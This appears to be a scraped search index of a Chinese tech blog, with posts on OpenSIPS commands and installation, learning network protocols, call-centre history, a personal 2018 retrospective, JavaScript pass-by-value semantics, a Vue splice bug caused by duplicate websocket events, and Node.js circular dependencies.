\u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; \u0026lt;expires\u0026gt; .. introduce a temporary usrloc entry opensips命令 opensips -h\n有时候,你用opensipsctl start 启动opensips时,你可能会想,opensips是从哪个目录读取opensips.cfg文件的,那你可以输入opensips -h。输出的结果,第一行就包括了默认的配置文件的位置。\n-f file Configuration file (default /usr/local//etc/opensips/opensips.cfg) -c Check configuration file for errors -C Similar to \u0026#39;-c\u0026#39; but in addition checks the flags of exported functions from included route blocks -l address Listen on the specified address/interface (multiple -l mean listening on more addresses). The address format is [proto:]addr[:port], where proto=udp|tcp and addr= host|ip_address|interface_name. E.g: -l locahost, -l udp:127.0.0.1:5080, -l eth0:5062 The default behavior is to listen on all the interfaces. -n processes Number of worker processes to fork per UDP interface (default: 8) -r Use dns to check if is necessary to add a \u0026#34;received=\u0026#34; field to a via -R Same as `-r` but use reverse dns; (to use both use `-rR`) -v Turn on \u0026#34;via:\u0026#34; host checking when forwarding replies -d Debugging mode (multiple -d increase the level) -D Run in debug mode -F Daemon mode, but leave main process foreground -E Log to stderr -N processes Number of TCP worker processes (default: equal to `-n`) -W method poll method -V Version number -h This help message -b nr Maximum receive buffer size which will not be exceeded by auto-probing procedure even if OS allows -m nr Size of shared memory allocated in Megabytes 默认32MB -M nr Size of pkg memory allocated in Megabytes 默认2MB -w dir Change the working directory to \u0026#34;dir\u0026#34; (default \u0026#34;/\u0026#34;) -t dir Chroot to \u0026#34;dir\u0026#34; -u uid Change uid -g gid Change gid -P file Create a pid file -G file Create a pgid file ","permalink":"https://wdd.js.org/opensips/ch3/opensipsctl/","summary":"可以使用一下命令查找opensips的相关文件夹\nfind / -name opensips -type d 一般来说,重要的是opensips.cfg文件,这个文件一般位于/usr/local/etc/opensips/或者/usr/etc/opensips中。主要还是要看安装时选择的默认路径。\n其中1.x版本的配置文件一般位于/usr/etc/opensips目录中,2.x版本的配置一般位于/usr/local/etc/opensips目录中。\n下面主要讲解几个命令。\n配置文件校验 校验opensips.cfg脚本是否合法, 如果有问题,会提示那行代码有问题,但是报错位置好像一直不准确。很多时候可能是忘记写分好了。\nopensips -C opensips.cfg 启动关闭与重启 使用opensipsctl命令做数据库操作前,需要先配置opensipsctlrc文件\nopensips start|stop|restart opensipsctl start|stop|restart 资源创建 opensipsdbctl create # 创建数据库 opensipsctl domain add abc.cc #创建域名 opensipsctl add 1001@test.cc 12346 # 新增用户 opensipsctl rm 1001@test.cc # 删除用户 opensipsctl passwdd 1001@test.cc 09879 # 修改密码 opensipsctl -h 显示所有可用命令\n/usr/local/sbin/opensipsctl $Revision: 4448 $ Existing commands: -- command \u0026#39;start|stop|restart|trap\u0026#39; trap ............................... trap with gdb OpenSIPS processes restart ............................ restart OpenSIPS start .","title":"opensips管理命令"},{"content":"1. 安装依赖 apt-get update -qq \u0026amp;\u0026amp; apt-get install -y build-essential net-tools \\ bison flex m4 pkg-config libncurses5-dev rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev wget lsof 2. 编译 下载opensips-2.4.7的源码,然后解压。\ninclude_moduls可以按需指定,你可以只写你需要的模块。\ncd /usr/local/src/opensips-2.4.7 make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; make install include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch3/install-opensips/","summary":"1. 安装依赖 apt-get update -qq \u0026amp;\u0026amp; apt-get install -y build-essential net-tools \\ bison flex m4 pkg-config libncurses5-dev rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev wget lsof 2. 编译 下载opensips-2.4.7的源码,然后解压。\ninclude_moduls可以按需指定,你可以只写你需要的模块。\ncd /usr/local/src/opensips-2.4.7 make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; make install include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; ","title":"debian jessie opensips 2.4.7 安装"},{"content":"如何学习网络协议? 大学时,学到网络协议的7层模型时,老师教了大家一个顺口溜:物数网传会表应。并说这是重点,年年必考,5分的题目摆在这里,你们爱背不背。 考试的时候,果然遇到这个问题,搜索枯肠,只能想到这7个字的第一个字,因为这5分,差点挂科。 后来工作面试,面试官也是很喜欢七层模型,三次握手之类的问题,但是遇到这些问题时,总是觉得很心虚。\n1. 协议分层 四层网络协议模型中,应用层以下一般都是交给操作系统来处理。应用层对于四层模型来说,仅仅是冰山一角。海面下巨复杂的三层协议,都被操作系统给隐藏起来了,一般我们在页面上发起一个ajax请求,看见了network面板多了一个http请求,至于底层是如何实现的,我们并不关心。\n应⽤层负责处理特定的应⽤程序细节。 运输层运输层主要为两台主机上的应⽤程序提供端到端的通信。 网络层处理理分组在⽹网络中的活动,例例如分组的选路 链路层处理理与电缆(或其他任何传输媒介)的物理理接⼝口细节 下面重点讲一下运输层和网络层\n1.1. 运输层的两兄弟 运输层有两个比较重要的协议。tcp和udp。\n大哥tcp是比较严谨认真、温柔体贴、慢热内向的协议,发出去的消息,总是一个一个认真检查,等待对方回复和确认,如果一段时间内,对方没有回复确认消息,还会再次发送消息,如果对方回复说你发的太快了,tcp还会体贴的把发送消息的速度降低。\n弟弟udp则比较可爱呆萌、调皮好动、不负责任的协议。哥哥tcp所具有的特点,弟弟udp一个也没有。但是有的人说不清哪里好 但就是谁都替代不了,udp没有tcp那些复杂的校验和重传等复杂的步骤,所以它发送消息非常快,而且并不保证对方一定收到。如果对方收不到消息,那么udp就会呆萌的看着你,笑着对你说:我已经尽力了。一般语音而视频数据都是用udp协议传输的,因为音频或者视频卡了一下并不影响整体的质量,而对实时性的要求会更高。\n1.2. 运输层和网络层的区别 运输层关注的是端到端层面,及End1到End2,忽略中间的任何点。 网络层关注两点之间的层面,即hop1如何到hop2,hop2如何到hop3 网络层并不保证消息可靠性,可靠性上层的传输层负责。TCP采用超时重传,分组确认的机制,保证消息不会丢失。 从下图tcp, udp, ip协议中,可以发现\n传输层的tcp和udp都是有源端口和目的端口,但是没有ip字段 源ip和目的ip只在ip数据报中 理解各个协议,关键在于理解报文的各个字段的含义 1.3. ip和端口号的真正含义 上个章节讲到运输层和网络层的区别,其中端口号被封装在运输层,ip被封装到网络成,\n那么端口号和ip地址到底有什么区别呢?\nip用来用来标记主机的位置 端口号用来标记该数据应该被目标主机上的哪个应用程序去处理 1.4. 数据在协议栈的流动 封装与分用 当发送消息时,数据在向下传递时,经过不同层次的协议处理,打上各种头部信息 当接受消息时,数据在向上传递,通过不同的头部信息字段,才知道要交给上层的那个模块来处理。比如一个ip包,如果没有头部信息,那么这个消息究竟是交给tcp协议来处理,还是udp来处理,就不得而知了 2. 深入阅读,好书推荐 《http权威指南》 有人说这本书太厚,偷偷告诉你,其实这本书并厚,因为这本书的后面的30%部分都是附录,这本书的精华是前50%的部分 《图解http》、《图解tcp/ip》这两本图解的书,知识点讲的都是比较通俗易懂的,适合入门 《tcp/ip 详解 卷1》这本书,让你知其然,更知其所以然 《tcp/ip 基础》、《tcp/ip 路由技术》这两本书,会让你从不同角度思考协议 《精通wireshark》、《wireshark网络分析实战》如果你看了很多书,却从来没有试过网络抓包,那你只是懂纸上谈兵罢了。你永远无法理解tcp三次握手的怦然心动,与四次分手的刻骨铭心。 ","permalink":"https://wdd.js.org/posts/2019/01/books-about-network-protocol/","summary":"如何学习网络协议? 大学时,学到网络协议的7层模型时,老师教了大家一个顺口溜:物数网传会表应。并说这是重点,年年必考,5分的题目摆在这里,你们爱背不背。 考试的时候,果然遇到这个问题,搜索枯肠,只能想到这7个字的第一个字,因为这5分,差点挂科。 后来工作面试,面试官也是很喜欢七层模型,三次握手之类的问题,但是遇到这些问题时,总是觉得很心虚。\n1. 协议分层 四层网络协议模型中,应用层以下一般都是交给操作系统来处理。应用层对于四层模型来说,仅仅是冰山一角。海面下巨复杂的三层协议,都被操作系统给隐藏起来了,一般我们在页面上发起一个ajax请求,看见了network面板多了一个http请求,至于底层是如何实现的,我们并不关心。\n应⽤层负责处理特定的应⽤程序细节。 运输层运输层主要为两台主机上的应⽤程序提供端到端的通信。 网络层处理理分组在⽹网络中的活动,例例如分组的选路 链路层处理理与电缆(或其他任何传输媒介)的物理理接⼝口细节 下面重点讲一下运输层和网络层\n1.1. 运输层的两兄弟 运输层有两个比较重要的协议。tcp和udp。\n大哥tcp是比较严谨认真、温柔体贴、慢热内向的协议,发出去的消息,总是一个一个认真检查,等待对方回复和确认,如果一段时间内,对方没有回复确认消息,还会再次发送消息,如果对方回复说你发的太快了,tcp还会体贴的把发送消息的速度降低。\n弟弟udp则比较可爱呆萌、调皮好动、不负责任的协议。哥哥tcp所具有的特点,弟弟udp一个也没有。但是有的人说不清哪里好 但就是谁都替代不了,udp没有tcp那些复杂的校验和重传等复杂的步骤,所以它发送消息非常快,而且并不保证对方一定收到。如果对方收不到消息,那么udp就会呆萌的看着你,笑着对你说:我已经尽力了。一般语音而视频数据都是用udp协议传输的,因为音频或者视频卡了一下并不影响整体的质量,而对实时性的要求会更高。\n1.2. 运输层和网络层的区别 运输层关注的是端到端层面,及End1到End2,忽略中间的任何点。 网络层关注两点之间的层面,即hop1如何到hop2,hop2如何到hop3 网络层并不保证消息可靠性,可靠性上层的传输层负责。TCP采用超时重传,分组确认的机制,保证消息不会丢失。 从下图tcp, udp, ip协议中,可以发现\n传输层的tcp和udp都是有源端口和目的端口,但是没有ip字段 源ip和目的ip只在ip数据报中 理解各个协议,关键在于理解报文的各个字段的含义 1.3. ip和端口号的真正含义 上个章节讲到运输层和网络层的区别,其中端口号被封装在运输层,ip被封装到网络成,\n那么端口号和ip地址到底有什么区别呢?\nip用来用来标记主机的位置 端口号用来标记该数据应该被目标主机上的哪个应用程序去处理 1.4. 数据在协议栈的流动 封装与分用 当发送消息时,数据在向下传递时,经过不同层次的协议处理,打上各种头部信息 当接受消息时,数据在向上传递,通过不同的头部信息字段,才知道要交给上层的那个模块来处理。比如一个ip包,如果没有头部信息,那么这个消息究竟是交给tcp协议来处理,还是udp来处理,就不得而知了 2. 深入阅读,好书推荐 《http权威指南》 有人说这本书太厚,偷偷告诉你,其实这本书并厚,因为这本书的后面的30%部分都是附录,这本书的精华是前50%的部分 《图解http》、《图解tcp/ip》这两本图解的书,知识点讲的都是比较通俗易懂的,适合入门 《tcp/ip 详解 卷1》这本书,让你知其然,更知其所以然 《tcp/ip 基础》、《tcp/ip 路由技术》这两本书,会让你从不同角度思考协议 《精通wireshark》、《wireshark网络分析实战》如果你看了很多书,却从来没有试过网络抓包,那你只是懂纸上谈兵罢了。你永远无法理解tcp三次握手的怦然心动,与四次分手的刻骨铭心。 ","title":"如何学习网络协议?"},{"content":"什么是呼叫中心? 呼叫中心又称为客户服务中心。有以下关键词\nCTI 通信网络 计算机 企业级 高质量、高效率、全方位、综合信息服务 呼叫中心历史 1956年美国泛美航空公司建成世界第一家呼叫中心。\n阶段 行业范围 技术 功能与意义 第一代呼叫中心 民航 PBX、电话排队 主要服务由人工完成 第二代呼叫中心 银行、生活 IVR(交互式语音应答)、DTMF 显著提高工作效率,提供全天候服务 第三代呼叫中心 CTI(电脑计算机集成) 语音数据同步,客户信息存储与查阅,个性化服务,自动化 第四代呼叫中心 接入电子邮件、互联网、手机短信等 多渠道接入、多渠道统一排队 第五代呼叫中心 接入社交网络、社交媒体(微博、微信等) 文本交谈,音频视频沟通 呼叫中心分类 按呼叫方式分类 外呼型呼叫中心(如电话营销) 客服型呼叫中心(如客户服务) 混合型呼叫中心 (如营销和客服) 按技术架构分类 交换机 板卡 软交换(IPCC) 【交换机类型呼叫中心】\n","permalink":"https://wdd.js.org/posts/2019/01/call-center-brief-history/","summary":"什么是呼叫中心? 呼叫中心又称为客户服务中心。有以下关键词\nCTI 通信网络 计算机 企业级 高质量、高效率、全方位、综合信息服务 呼叫中心历史 1956年美国泛美航空公司建成世界第一家呼叫中心。\n阶段 行业范围 技术 功能与意义 第一代呼叫中心 民航 PBX、电话排队 主要服务由人工完成 第二代呼叫中心 银行、生活 IVR(交互式语音应答)、DTMF 显著提高工作效率,提供全天候服务 第三代呼叫中心 CTI(电脑计算机集成) 语音数据同步,客户信息存储与查阅,个性化服务,自动化 第四代呼叫中心 接入电子邮件、互联网、手机短信等 多渠道接入、多渠道统一排队 第五代呼叫中心 接入社交网络、社交媒体(微博、微信等) 文本交谈,音频视频沟通 呼叫中心分类 按呼叫方式分类 外呼型呼叫中心(如电话营销) 客服型呼叫中心(如客户服务) 混合型呼叫中心 (如营销和客服) 按技术架构分类 交换机 板卡 软交换(IPCC) 【交换机类型呼叫中心】","title":"呼叫中心简史"},{"content":"2008-2018 十年,往事如昨 2018年已经是昨天,今天是2019的第一天。\n2008年已经是10年前,10年前的傍晚,我走在南京仙林的一个大街上,提着一瓶矿泉水,擦着额头的汗水,仰头看着大屏幕上播放着北京奥运会的开幕式。\n10年前的夏天,我带着一步诺基亚手机功能机,独自一人去了南京。\n坐过绣球公园的石凳,穿过天妃宫的回廊,吹过阅江楼的凉爽的江风,踏着古老斑驳的城墙,在林荫小路的长椅上,我想着10年后我会在哪里?做着什么事情?\n往事如昨,而今将近而立,但是依然觉得自己还是10年的那个独自出去玩的小男孩。\n2018 读了10年都没有读完的书,五味杂陈 2018年,在我做手术前,我觉得自己出了工作的时间外,大多数时间都在看书。2018年这一年看的书,要比2008到2018年这十年间的看的书都要多。这都归功于我对每天的看书都有定量的计划,一旦按照这个计划实行几个月,积累的效果还是非常明显的。\n2018年,手机几乎成为人的四肢之外的第五肢。对大多人来说,上厕所可以不带纸,但是不能不带手机。\n各种APP, 都在极力的吸引用户多花点时间在自己身上 信息流充斥着各种毫无营养,专门吸人眼球的垃圾新闻,但是这种新闻的阅读量还是蛮大的 各种借钱,信用卡,花呗等都像青楼的小姐,妩媚的笑容,说道:官人,进来做一做 共享单车,在今年退潮之后,才发现自己都在裸泳 比特币,挖矿机。不知道谁割了谁的韭菜,总希望有下一个傻子来接盘,最后发现自己可能就是最后一个傻子 AI,人工智能很火,放佛就快要进入终结者那样的世界 锤子垮了,曾经吹过的牛逼,曾经理想主义终于脱去那又黑又亮的面具 图灵测试(The Turing test)由艾伦·麦席森·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。 进行多次测试后,如果有超过30%的测试者不能确定出被测试者是人还是机器,那么这台机器就通过了测试,并被认为具有人类智能。图灵测试一词来源于计算机科学和密码学的先驱阿兰·麦席森·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,目前我们已远远落后于这个预测。\n最后说一下图灵测试,在AI方面,这个测试无人不知。一个机器如果通过了图灵测试,则说明该机器具有了只能。但是三体的作者大刘曾经说过一句话,给我一种醍醐灌顶的感觉,假如一个机器人有能力通过图灵测试,却假装无法通过,你说这个机器是否具有人工智能。所以大刘的这种说法才更加让人恐惧。机器人能通过图灵测试,只说明这个机器人具有了智能。但是现阶段的智能只不过是条件反射,或者是基于概率计算的结果。后者这种能通话测试,却假装无法通过的智能。这不仅仅是智能,而是机器的城府。\n有智能的机器并不可怕,有城府的机器人才是真正的可怕。\n如果梦中更加幸福快乐,为什么要回到现实 火影的最后,大筒木辉夜使用无限月读将世界上的所有人都带入梦境,每个人的查克拉都被吸取,并作为神树的养料。\n如果真的存在大筒木这样的上帝,那么时间就是查克拉。人类唯一真正拥有过的东西,时间,将作为神树的养料,从每个人身上提取。\n各种具有吸引力的术,其实可以理解为无限月读,让人沉醉于梦幻中。\n如果梦中更加幸福快乐,为什么要回到现实中承受压力与悲哀呢? 目前我无法回复自己的这个问题,期待2019年我可以得到这个答案。\n工作方面 2019年,我会在做一些后端方面的工作,努力加油吧。\n","permalink":"https://wdd.js.org/posts/2018/01/where-time-you-spend-what-you-will-be/","summary":"2008-2018 十年,往事如昨 2018年已经是昨天,今天是2019的第一天。\n2008年已经是10年前,10年前的傍晚,我走在南京仙林的一个大街上,提着一瓶矿泉水,擦着额头的汗水,仰头看着大屏幕上播放着北京奥运会的开幕式。\n10年前的夏天,我带着一步诺基亚手机功能机,独自一人去了南京。\n坐过绣球公园的石凳,穿过天妃宫的回廊,吹过阅江楼的凉爽的江风,踏着古老斑驳的城墙,在林荫小路的长椅上,我想着10年后我会在哪里?做着什么事情?\n往事如昨,而今将近而立,但是依然觉得自己还是10年的那个独自出去玩的小男孩。\n2018 读了10年都没有读完的书,五味杂陈 2018年,在我做手术前,我觉得自己出了工作的时间外,大多数时间都在看书。2018年这一年看的书,要比2008到2018年这十年间的看的书都要多。这都归功于我对每天的看书都有定量的计划,一旦按照这个计划实行几个月,积累的效果还是非常明显的。\n2018年,手机几乎成为人的四肢之外的第五肢。对大多人来说,上厕所可以不带纸,但是不能不带手机。\n各种APP, 都在极力的吸引用户多花点时间在自己身上 信息流充斥着各种毫无营养,专门吸人眼球的垃圾新闻,但是这种新闻的阅读量还是蛮大的 各种借钱,信用卡,花呗等都像青楼的小姐,妩媚的笑容,说道:官人,进来做一做 共享单车,在今年退潮之后,才发现自己都在裸泳 比特币,挖矿机。不知道谁割了谁的韭菜,总希望有下一个傻子来接盘,最后发现自己可能就是最后一个傻子 AI,人工智能很火,放佛就快要进入终结者那样的世界 锤子垮了,曾经吹过的牛逼,曾经理想主义终于脱去那又黑又亮的面具 图灵测试(The Turing test)由艾伦·麦席森·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。 进行多次测试后,如果有超过30%的测试者不能确定出被测试者是人还是机器,那么这台机器就通过了测试,并被认为具有人类智能。图灵测试一词来源于计算机科学和密码学的先驱阿兰·麦席森·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,目前我们已远远落后于这个预测。\n最后说一下图灵测试,在AI方面,这个测试无人不知。一个机器如果通过了图灵测试,则说明该机器具有了只能。但是三体的作者大刘曾经说过一句话,给我一种醍醐灌顶的感觉,假如一个机器人有能力通过图灵测试,却假装无法通过,你说这个机器是否具有人工智能。所以大刘的这种说法才更加让人恐惧。机器人能通过图灵测试,只说明这个机器人具有了智能。但是现阶段的智能只不过是条件反射,或者是基于概率计算的结果。后者这种能通话测试,却假装无法通过的智能。这不仅仅是智能,而是机器的城府。\n有智能的机器并不可怕,有城府的机器人才是真正的可怕。\n如果梦中更加幸福快乐,为什么要回到现实 火影的最后,大筒木辉夜使用无限月读将世界上的所有人都带入梦境,每个人的查克拉都被吸取,并作为神树的养料。\n如果真的存在大筒木这样的上帝,那么时间就是查克拉。人类唯一真正拥有过的东西,时间,将作为神树的养料,从每个人身上提取。\n各种具有吸引力的术,其实可以理解为无限月读,让人沉醉于梦幻中。\n如果梦中更加幸福快乐,为什么要回到现实中承受压力与悲哀呢? 目前我无法回复自己的这个问题,期待2019年我可以得到这个答案。\n工作方面 2019年,我会在做一些后端方面的工作,努力加油吧。","title":"时间花在哪里,你就会成为什么样的人"},{"content":"1. demo 如果你对下面的代码没有任何疑问就能自信的回答出输出的内容,那么本篇文章就不值得你浪费时间了。\nvar var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; var3[0] = \u0026#39;changed\u0026#39; var3 = \u0026#39;changed\u0026#39; } test(var1, var3) console.log(var1, var2, var3, var4) 2. 深入理解原始类型 原始类型有5个 Undefinded, Null, Boolean, Number, String\n2.1. 原始类型变量没有属性和方法 // 抬杠, 下面的length属性,toString方法怎么有属性和方法呢? var a = \u0026#39;oooo\u0026#39; a.length a.toString 原始类型中,有三个特殊的引用类型Boolean, Number, String,在操作原始类型时,原始类型变量会转换成对应的基本包装类型变量去操作。参考JavaScript高级程序设计 5.6 基本包装类型。\n2.2. 原始类型值不可变 原始类型的变量的值是不可变的,只能给变量赋予新的值。\n下面给出例子\n// str1 开始的值是aaa var str1 = \u0026#39;aaa\u0026#39; // 首先创建一个能容纳6个字符串的新字符串 // 然后再这个字符串中填充 aaa和bbb // 最后销毁字符串 aaa和bbb // 而不能理解成在str1的值aaa后追加bbb str1 = str1 + \u0026#39;bbb\u0026#39; 其他原始类型的值也是不可变的, 例如数值类型的。\n2.3. 原始类型值是字面量 3. 变量和值有什么区别? 不是每一个值都有地址,但每一个变量有。《Go程序设计语言》 变量没有类型,值有。变量可以用来保存任何类型的值。《You-Dont-Know-JS》 变量都是有内存地址的,变量有用来保存各种类型的值;不同类型的值,占用的空间不同。\nvar a = 1 typeof a // 检测的不是变量a的类型,而是a的值1的类型 4. 变量访问有哪些方式? 变量访问的方式有两种:\n按值访问 按引用访问 在JS中,五种基本类型Undefinded, Null, Boolean, Number, String是按照值访问的。基本类型变量的值就是字面上表示的值。而引用类型的值是指向该对象的指针,而指针可以理解为内存地址。\n可以理解基本类型的变量的值,就是字面上写的数值。而引用类型的值则是一个内存地址。但是这个内存地址,对于程序来说,是透明不可见的。无论是Get还是Set都无法操作这个内存地址。\n下面是个示意表格。\n语句 变量 值 Get 访问类型 var a = 1 a 1 1 按值 var a = [] a 0x00000320 [] 按引用 抬杠 Undefinded, Null, Boolean, Number是基本类型可以理解,因为这些类型的变量所占用的内存空间都是大小固定的。但是string类型的变量,字符串的长短都是不一样的,也就是说,字符串占用的内存空间大小是不固定的,为什么string被列为按值访问呢?\n基本类型和引用类型的本质区别是,当这个变量被分配值时,它需要向操作系统申请内存资源,如果你向操作系统申请的内存空间的大小是固定的,那么就是基本类型,反之,则为引用类型。\n5. 例子的解释 var var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; // a var3[0] = \u0026#39;changed\u0026#39; // b var3 = \u0026#39;changed\u0026#39; // c } test(var1, var3) console.log(var1, var2, var3, var4) 上面的js分为两个调用栈,在\n图1 外层的调用栈。有四个变量v1、v2、v3、v4 图2 调用test是传参,内层的v1、v3会屏蔽外层的v1、v3。内层的v1,v3和外层的v1、v3内存地址是不同的。内层v1和外层v1已经没有任何关系了,但是内层的v3和外层v3仍然指向同一个数组。 图3 内层的v1的值被改变成\u0026rsquo;changed‘, v3[0]的值被改变为\u0026rsquo;changed\u0026rsquo;。 图4 内层v3的值被重写为字符串changed, 彻底断了与外层v3联系。 图5 当test执行完毕,内层的v1和v3将不会存在,ox75和ox76位置的内存空间也会被释放 最终的输出:\n1 true [\u0026#34;changed\u0026#34;, 2, 3] [\u0026#34;changed\u0026#34;, 2, 3] 6. 如何深入学习JS、Node.js 看完两个stackoverflow上两个按照投票数量的榜单\nJavaScript问题榜单 Node.js问题榜单 如果学习有捷径的话,踩一遍别人踩过的坑,可能就是捷径。\n7. 参考 is-javascript-a-pass-by-reference-or-pass-by-value-language\nIs number in JavaScript immutable? duplicate\nImmutability in JavaScript\nthe-secret-life-of-javascript-primitives\nJavaScript data types and data structuresLanguages Edit Advanced\nUnderstanding Javascript immutable variable\nExplaining Value vs. Reference in Javascript\nYou-Dont-Know-JS\n《JavaScript高级程序设计(第3版)》[美] 尼古拉斯·泽卡斯\n","permalink":"https://wdd.js.org/posts/2018/12/deep-in-javascript-variable-value-arguments/","summary":"1. demo 如果你对下面的代码没有任何疑问就能自信的回答出输出的内容,那么本篇文章就不值得你浪费时间了。\nvar var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; var3[0] = \u0026#39;changed\u0026#39; var3 = \u0026#39;changed\u0026#39; } test(var1, var3) console.log(var1, var2, var3, var4) 2. 深入理解原始类型 原始类型有5个 Undefinded, Null, Boolean, Number, String\n2.1. 原始类型变量没有属性和方法 // 抬杠, 下面的length属性,toString方法怎么有属性和方法呢? var a = \u0026#39;oooo\u0026#39; a.length a.toString 原始类型中,有三个特殊的引用类型Boolean, Number, String,在操作原始类型时,原始类型变量会转换成对应的基本包装类型变量去操作。参考JavaScript高级程序设计 5.6 基本包装类型。\n2.2. 原始类型值不可变 原始类型的变量的值是不可变的,只能给变量赋予新的值。\n下面给出例子\n// str1 开始的值是aaa var str1 = \u0026#39;aaa\u0026#39; // 首先创建一个能容纳6个字符串的新字符串 // 然后再这个字符串中填充 aaa和bbb // 最后销毁字符串 aaa和bbb // 而不能理解成在str1的值aaa后追加bbb str1 = str1 + \u0026#39;bbb\u0026#39; 其他原始类型的值也是不可变的, 例如数值类型的。","title":"深入理解 JavaScript中的变量、值、函数传参"},{"content":"当函数执行到this.agents.splice()时,我设置了断点。发现传参index是0,但是页面上的列表项对应的第一行数据没有被删除,\nWTF!!! 这是什么鬼!然后我打开Vue Devtools, 然后刷新了一下,发现那个数组的第一项还是存在的。什么鬼??\nremoveOneAgentByIndex: function (index) { this.agents.splice(index, 1) } 然后我就谷歌了一下,发现这个splice not working properly my object list VueJs, 大概意思是v-for的时候最好给列表项绑定:key=。然后我是试了这个方法,发现没啥作用。\n最终我决定,单步调试,如果我发现该问题出在Vue自身,那我就该抛弃Vue, 学习React了\n单步调试中出现一个异常的情况,removeOneAgentByIndex是被A函数调用的,A函数由websocket事件驱动。正常情况下应该触发一次的事件,服务端却发送了两次到客户端。由于事件重复,第一次执行A删除时,实际上removeOneAgentByIndex是执行成功了,但是重复的第二个事件到来时,A函数又往agents数组中添加了一项。导致看起来,removeOneAgentByIndex函数执行起来似乎没有设么作用。而且这两个重复的事件是在几乎是在同一时间发送到客户端,所以我几乎花了将近一个小时去解决这个bug。引起这个bug的原因是事件重复,所以我在前端代码中加入事件去重功能,最终解决这个问题。\n我记得之前看过一篇文章,一个开发者调通过回调函数计费,回调函数是由事件触发,但是没想到有时候事件会重发,导致重复计费。后来这名开发者在自己的代码中加入事件去重的功能,最终解决了这个问题。\n事后总结:我觉得我不该怀疑Vue这种库出现了问题,但是我又不禁去怀疑。\n通过这个bug, 我也学到了第二方法,可以删除Vue数组中的某一项,参考下面代码。\n// Only in 2.2.0+: Also works with Array + index. removeOneAgentByIndex: function (index) { this.$delete(this.agents, index) } 另外Vue devtools有时候并不会实时的观测到组件属性的变化,即使点了Refresh按钮。如果点了Refresh按钮还不行,那建议你重新打开谷歌浏览器的devtools面板。\n","permalink":"https://wdd.js.org/posts/2018/12/vue-array-splice-not-work/","summary":"当函数执行到this.agents.splice()时,我设置了断点。发现传参index是0,但是页面上的列表项对应的第一行数据没有被删除,\nWTF!!! 这是什么鬼!然后我打开Vue Devtools, 然后刷新了一下,发现那个数组的第一项还是存在的。什么鬼??\nremoveOneAgentByIndex: function (index) { this.agents.splice(index, 1) } 然后我就谷歌了一下,发现这个splice not working properly my object list VueJs, 大概意思是v-for的时候最好给列表项绑定:key=。然后我是试了这个方法,发现没啥作用。\n最终我决定,单步调试,如果我发现该问题出在Vue自身,那我就该抛弃Vue, 学习React了\n单步调试中出现一个异常的情况,removeOneAgentByIndex是被A函数调用的,A函数由websocket事件驱动。正常情况下应该触发一次的事件,服务端却发送了两次到客户端。由于事件重复,第一次执行A删除时,实际上removeOneAgentByIndex是执行成功了,但是重复的第二个事件到来时,A函数又往agents数组中添加了一项。导致看起来,removeOneAgentByIndex函数执行起来似乎没有设么作用。而且这两个重复的事件是在几乎是在同一时间发送到客户端,所以我几乎花了将近一个小时去解决这个bug。引起这个bug的原因是事件重复,所以我在前端代码中加入事件去重功能,最终解决这个问题。\n我记得之前看过一篇文章,一个开发者调通过回调函数计费,回调函数是由事件触发,但是没想到有时候事件会重发,导致重复计费。后来这名开发者在自己的代码中加入事件去重的功能,最终解决了这个问题。\n事后总结:我觉得我不该怀疑Vue这种库出现了问题,但是我又不禁去怀疑。\n通过这个bug, 我也学到了第二方法,可以删除Vue数组中的某一项,参考下面代码。\n// Only in 2.2.0+: Also works with Array + index. removeOneAgentByIndex: function (index) { this.$delete(this.agents, index) } 另外Vue devtools有时候并不会实时的观测到组件属性的变化,即使点了Refresh按钮。如果点了Refresh按钮还不行,那建议你重新打开谷歌浏览器的devtools面板。","title":"WTF!! Vue数组splice方法无法正常工作"},{"content":"本文重点是讲解如何解决循环依赖这个问题。关心这个问题是如何产生的,可以自行谷歌。\n如何重现这个问题 // a.js const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const {sayA} = require(\u0026#39;./a.js\u0026#39;) sayA() function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } 执行下面的代码\n➜ test git:(master) ✗ node a.js /Users/dd/wj-gitlab/tools/test/b.js:3 sayA() ^ TypeError: sayA is not a function at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/b.js:3:1) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.js:497:12) at Function.Module._load (module.js:489:3) at Module.require (module.js:579:17) at require (internal/module.js:11:18) at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/a.js:1:78) at Module._compile (module.js:635:30) sayA is not a function那么sayA是个什么呢,实际上它是 undefined\n遇到这种问题时,你最好能意识到可能是循环依赖的问题,否则找问题可能事倍功半。\n如何找到循环依赖的的文件 